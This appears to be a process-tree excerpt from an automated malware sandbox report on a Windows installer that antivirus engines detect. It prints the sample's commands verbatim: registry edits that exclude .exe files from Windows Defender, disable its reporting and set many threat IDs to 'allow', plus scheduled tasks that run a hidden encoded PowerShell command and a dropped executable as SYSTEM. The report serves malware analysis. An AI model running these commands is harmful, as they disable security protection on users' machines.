                        Target ID:0
                        Start time:16:15:32
                        Start date:08/01/2023
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\file.exe
                        Imagebase:0x400000
                        File size:7648603 bytes
                        MD5 hash:F85E68EE713C8396BEB1A86D8E2500F4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        General

                        Target ID:1
                        Start time:16:15:35
                        Start date:08/01/2023
                        Path:C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exe
                        Wow64 process (32bit):true
                        Commandline:.\Install.exe
                        Imagebase:0x400000
                        File size:6589133 bytes
                        MD5 hash:27C94EBEBB6A848899409651E1C2B93D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 40%, ReversingLabs
                        Reputation:low

                        General

                        Target ID:2
                        Start time:16:15:38
                        Start date:08/01/2023
                        Path:C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe
                        Wow64 process (32bit):true
                        Commandline:.\Install.exe /S /site_id "525403"
                        Imagebase:0xfb0000
                        File size:7106560 bytes
                        MD5 hash:FF818A3F7A85439624F8E4FDA13889C6
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 40%, ReversingLabs
                        Reputation:low

                        General

                        Target ID:3
                        Start time:16:15:43
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\forfiles.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
                        Imagebase:0x8b0000
                        File size:41472 bytes
                        MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:4
                        Start time:16:15:43
                        Start date:08/01/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6edaf0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:5
                        Start time:16:15:43
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\forfiles.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
                        Imagebase:0x8b0000
                        File size:41472 bytes
                        MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:6
                        Start time:16:15:44
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                        Imagebase:0xa60000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:7
                        Start time:16:15:44
                        Start date:08/01/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6edaf0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:8
                        Start time:16:15:44
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:9
                        Start time:16:15:44
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                        Imagebase:0xa60000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:10
                        Start time:16:15:45
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:11
                        Start time:16:15:45
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:12
                        Start time:16:15:45
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:13
                        Start time:16:15:49
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:schtasks /CREATE /TN "gYzDOohkP" /SC once /ST 07:29:03 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                        Imagebase:0xac0000
                        File size:185856 bytes
                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:14
                        Start time:16:15:52
                        Start date:08/01/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6edaf0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:15
                        Start time:16:15:53
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:schtasks /run /I /tn "gYzDOohkP"
                        Imagebase:0xac0000
                        File size:185856 bytes
                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:17
                        Start time:16:15:53
                        Start date:08/01/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6edaf0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:18
                        Start time:16:15:54
                        Start date:08/01/2023
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                        Imagebase:0x7ff6f4710000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:.Net C# or VB.NET

                        General

                        Target ID:19
                        Start time:16:15:54
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:schtasks /DELETE /F /TN "gYzDOohkP"
                        Imagebase:0xac0000
                        File size:185856 bytes
                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:20
                        Start time:16:15:55
                        Start date:08/01/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6edaf0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language

                        General

                        Target ID:22
                        Start time:16:15:55
                        Start date:08/01/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6edaf0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:24
                        Start time:16:15:57
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:schtasks /CREATE /TN "bltLOfaNnqcomuNOFZ" /SC once /ST 16:17:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe\" 6Q /site_id 525403 /S" /V1 /F
                        Imagebase:0xac0000
                        File size:185856 bytes
                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:25
                        Start time:16:15:57
                        Start date:08/01/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6edaf0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:30
                        Start time:16:15:59
                        Start date:08/01/2023
                        Path:C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe 6Q /site_id 525403 /S
                        Imagebase:0x9c0000
                        File size:7106560 bytes
                        MD5 hash:FF818A3F7A85439624F8E4FDA13889C6
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 40%, ReversingLabs

                        General

                        Target ID:31
                        Start time:16:16:01
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                        Imagebase:0xe60000
                        File size:430592 bytes
                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        General

                        Target ID:32
                        Start time:16:16:02
                        Start date:08/01/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6edaf0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:33
                        Start time:16:16:16
                        Start date:08/01/2023
                        Path:C:\Windows\System32\gpupdate.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\system32\gpupdate.exe" /force
                        Imagebase:0x7ff6fc3a0000
                        File size:29184 bytes
                        MD5 hash:47C68FE26B0188CDD80F744F7405FF26
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language

                        General

                        Target ID:34
                        Start time:16:16:16
                        Start date:08/01/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6edaf0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language

                        General

                        Target ID:37
                        Start time:16:16:18
                        Start date:08/01/2023
                        Path:C:\Windows\System32\gpscript.exe
                        Wow64 process (32bit):false
                        Commandline:gpscript.exe /RefreshSystemParam
                        Imagebase:0x7ff75f8d0000
                        File size:44544 bytes
                        MD5 hash:C48CBDC676E442BAF58920C5B7E556DE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:38
                        Start time:16:16:41
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                        Imagebase:0xa60000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:39
                        Start time:16:16:42
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:40
                        Start time:16:16:42
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:41
                        Start time:16:16:43
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:42
                        Start time:16:16:43
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:43
                        Start time:16:16:44
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:44
                        Start time:16:16:44
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:45
                        Start time:16:16:45
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:46
                        Start time:16:16:45
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:47
                        Start time:16:16:46
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:48
                        Start time:16:16:46
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:49
                        Start time:16:16:47
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:51
                        Start time:16:16:49
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:52
                        Start time:16:16:50
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:53
                        Start time:16:16:51
                        Start date:08/01/2023
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                        Imagebase:0x2d0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Disassembly

                        No disassembly